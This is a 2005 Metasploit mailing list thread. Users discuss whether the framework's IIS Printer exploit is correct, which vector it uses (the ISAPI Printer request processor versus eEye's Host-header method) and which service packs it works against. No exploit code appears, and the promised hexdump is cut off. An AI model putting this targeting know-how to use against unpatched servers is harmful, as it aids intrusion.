Metasploit mailing list archives

[BUG] please confirm


From: nulldevice83 at yahoo.com (Null Device)
Date: Thu, 14 Apr 2005 09:09:55 -0700 (PDT)

thx dave for the link
thx everyone who helped in clearing out this.

--ND
--- Dave C <chaboyd77 at yahoo.com> wrote:

Here is a good link from eEye I found on this:
 

http://list.cineca.it/cgi-bin/wa?A2=ind0106&L=security-archive&F=&S=&P=85839
 
Dave

Dave C <chaboyd77 at yahoo.com> wrote:
 Apart from this, I think the exploit for printer
vulnerability is not the appropriate exploit.
 
It depends on your definition of "appropriate".  Are
you not able to get it to work?  It works fine
against Sp0 and Sp1.  It is the same vulnerability
patched by MS01-023, but you are right in that it is
not the same exploit vector.  It is in the ISAPI
Printer request processor. In the end both methods
get the same result.  This way just did not get
publicity since eEye posted the Host: header exploit
method and most of the public exploits use that
method.  
 
Dave

Null Device <nulldevice83 at yahoo.com> wrote:
This is wrt the last mail I sent
for the IIS Printer vulnerability.
The links given are:
http://www.osvdb.org/548 {This is an invalid link}
and 
http://seclists.org/lists/bugtraq/2001/May/0011.html
{points to a thread of openssl vulnerabilities}.

Apart from this, I think the exploit for printer
vulnerability is not the appropriate exploit. Please
refer to my previous mail for details.

Here I am attaching a hexdump of the data that is sent
by Metasploit for exploiting the printer vulnerability.



=== message truncated ===



                